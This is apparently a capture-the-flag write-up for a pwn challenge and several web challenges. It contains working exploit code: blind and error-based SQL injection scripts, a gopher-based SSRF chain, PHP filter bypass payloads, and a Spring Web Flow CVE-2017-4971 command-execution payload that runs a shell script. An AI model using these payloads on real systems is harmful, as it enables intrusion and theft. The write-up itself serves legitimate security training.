flag = codebase + 0x000000000202040   # address of the flag buffer in the binary
p.recvuntil("Input: ")
p.sendline("backdoor\x00")
p.recvuntil("Input: ")
#gdb.attach(p)
# 0x50 copies of the same pointer so the one that is used lands on it.
p.sendline(p64(flag)*0x50)
p.recvuntil("Input: ")
p.sendline("exitexit\x00")
p.interactive()
WEB
middle_magic
绕过正则:
/?aaa=%0apass_the_level_1%23
sha1用数组绕过,还有一个弱比较,用true绕过
最后payload
POST:
admin[]=1&root_pwd[]=2&level_3={"result":true}
easy_sql_2
version:8.0.26-0ubuntu0.20.04.2
import requests
# Boolean-based blind extraction against the CTF instance: one character of the
# flag per outer iteration, using the server's "username error!" text as the oracle.
url = 'http://182.116.62.85:26571/login.php'
res = 'flag{spMG94bd95z7h07ZZhCFXQutxY'   # characters recovered so far; the loop appends to it
for i in range(32):
    for x in range(33,127):
        # Characters that would break the quoted literal or the comment are not tried.
        if chr(x) not in '\'\\"#$^%':
            # Leftover alternative query kept as an unused string literal; it is never sent.
            """
data = {
"username":'''admin'/**/and/**/(('ctf','{}',3,4,5,6)<(table/**/mysql.innodb_table_stats/**/limit/**/0,1))#'''.format(res+chr(x)),
"password":"123"
}
"""
            data = {
                "username":'''admin'/**/and/**/(binary('{}')<(table/**/fl11aag/**/limit/**/1,1))#'''.format(res+chr(x)),
                "password":"123"
            }
            #print(data)
            r = requests.post(url,data=data)
            #print(r.text)
            # The comparison holds while res+chr(x) sorts below the stored value; the
            # first x that fails is one past the real character, hence chr(x-1).
            if "username error!" in r.text:
                res += chr(x-1)
                print(res)
                break
easy_sql_1
use.php有个curl
可以用gopher协议访问到index.php
用admin:admin登录成功后,出现cookie,是base64后的username
在cookie处存在注入,可以通过报错拿到flag
import requests
import urllib.parse
import base64
# use.php fetches an attacker-chosen URL; a gopher:// URL is used to deliver a
# raw HTTP request to index.php on localhost with the injected cookie.
url = 'http://182.116.62.85:28303/use.php'
sqlpayload = 'uname=admin&passwd=admin&Submit=1'
# Cookie value carrying the error-based injection; base64-encoded and URL-quoted below.
cookie = b'''this_is_your_cookie=admin') and updatexml(1,concat(0x7e,(select substr((select flag from flag),1,40))),1)#'''
# sqlbody1 (a POST login) is built but never sent; note it also lacks the blank
# line between headers and body, so it would not be a well-formed request.
sqlbody1 = '''POST /index.php HTTP/1.1
Host: 127.0.0.1
Content-type:application/x-www-form-urlencoded
Content-Length: {}
{}
'''.replace('\n','\r\n').format(len(sqlpayload),sqlpayload)
# The request that is actually sent: GET with the session cookie and the injected one,
# with CRLF line endings.
sqlbody = '''GET /index.php HTTP/1.1
Host: 127.0.0.1
Cookie: PHPSESSID=3qip5l91lc1jtal09u9h40tkp0;this_is_your_cookie={}
'''.replace('\n','\r\n').format(urllib.parse.quote(str(base64.b64encode(cookie),encoding='utf-8')))
print(sqlbody)
# Two layers of quoting: the request becomes the gopher path, then the whole
# gopher:// URL is quoted again to survive as the `url` query parameter.
gopher_payload = urllib.parse.quote('gopher://127.0.0.1:80/_'+ urllib.parse.quote(sqlbody))
r = requests.get(url+'?url='+gopher_payload)
print(r.text)
easyP
第一个正则匹配结尾部分,后面加字符绕过,结合basename无法处理非ascii字符,在后面添加%ff
basename就会获取到utils.php
第二个正则url编码绕过
/index.php/utils.php/%ff?show%5fsource=1
Spring
CVE-2017-4971
Spring Web Flow 远程代码执行漏洞复现
Confirm处添加恶意数据即可实现命令执行
如:
&_(new+java.lang.ProcessBuilder("/bin/bash","/tmp/shell.sh")).start()=feifei